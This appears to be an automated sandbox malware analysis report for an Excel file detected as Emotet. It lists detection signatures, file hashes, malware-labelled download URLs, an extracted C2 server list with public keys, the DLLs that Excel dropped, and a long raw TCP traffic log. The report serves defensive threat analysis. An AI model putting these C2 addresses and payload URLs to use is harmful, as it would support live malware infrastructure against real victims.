Windows Analysis Report
PO0000001552.xls

Overview

General Information

Sample Name: PO0000001552.xls
Analysis ID: 745091
MD5: ecdc3f1e9afd2ce212a12ba3a844f521
SHA1: 0121ba555dfe0b42834759d201cce505bd619f86
SHA256: 1e494fd9ec670e351dd80258489770ffa43ee6f4be3e14c797f7ce64ae8e9d43
Infos:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Office process drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Drops files with a non-matching file extension (content does not match file extension)
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Drops PE files to the user directory
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: PO0000001552.xls Virustotal: Detection: 66% Perma Link
Antivirus detection for URL or domain
Source: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/F Avira URL Cloud: Label: malware
Source: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/ Avira URL Cloud: Label: malware
Source: http://ly.yjlianyi.top/wp-admin/4cChao/ Avira URL Cloud: Label: malware
Source: http://sbm.xinmoshiwang.com/upload/VaOfWEb3pW76UO/ Avira URL Cloud: Label: malware
Source: https://182.162.143.56/tkafmhcgcid/ Avira URL Cloud: Label: malware
Source: https://182.162.143.56/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: sbm.xinmoshiwang.com Virustotal: Detection: 13% Perma Link
Source: datie-tw.com Virustotal: Detection: 10% Perma Link
Source: copunupo.ac.zm Virustotal: Detection: 17% Perma Link
Source: ly.yjlianyi.top Virustotal: Detection: 13% Perma Link
Source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["173.255.211.88:443", "45.63.99.23:7080", "182.162.143.56:443", "91.187.140.35:8080", "212.24.98.99:8080", "119.59.103.152:8080", "45.235.8.30:8080", "172.104.251.154:8080", "72.15.201.15:8080", "169.57.156.166:8080", "103.75.201.2:443", "213.239.212.5:443", "164.90.222.65:443", "201.94.166.162:443", "94.23.45.86:4143", "183.111.227.137:8080", "186.194.240.217:443", "107.170.39.149:8080", "147.139.166.154:8080", "5.135.159.50:443", "206.189.28.199:8080", "104.168.155.143:8080", "129.232.188.93:443", "82.223.21.224:8080", "103.43.75.120:443", "103.132.242.26:8080", "139.59.56.73:8080", "164.68.99.3:8080", "202.129.205.3:8080", "167.172.199.165:8080", "110.232.117.186:8080", "209.97.163.214:443", "167.172.253.162:8080", "1.234.2.232:8080", "159.65.88.10:8080", "95.217.221.146:8080", "153.92.5.27:8080", "91.207.28.33:8080", "188.44.20.25:443", "153.126.146.25:7080", "163.44.196.120:8080", "172.105.226.75:8080", "115.68.227.76:8080", "159.65.140.115:443", "139.59.126.41:443", "197.242.150.244:8080", "45.176.232.124:443", "45.118.115.99:8080", "149.56.131.28:8080", "79.137.35.198:8080", "173.212.193.249:8080", "160.16.142.56:8080", "159.89.202.34:443", "185.4.135.165:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5kCHHpgAjAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2ayEIpgAYAJA="]}
Source: unknown HTTPS traffic detected: 175.98.167.165:443 -> 192.168.2.3:49697 version: TLS 1.2
Source: unknown HTTPS traffic detected: 41.63.0.22:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49713 version: TLS 1.2

Software Vulnerabilities
barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: EvvmhfKiKFhKrSuHfBq[1].dll.0.dr Jump to dropped file
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\2yXcjy57oZTTUNweDidCGUY[1].dll Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Section loaded: unknown origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: datie-tw.com
Source: global traffic DNS query: name: sbm.xinmoshiwang.com
Source: global traffic DNS query: name: copunupo.ac.zm
Source: global traffic DNS query: name: ly.yjlianyi.top
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
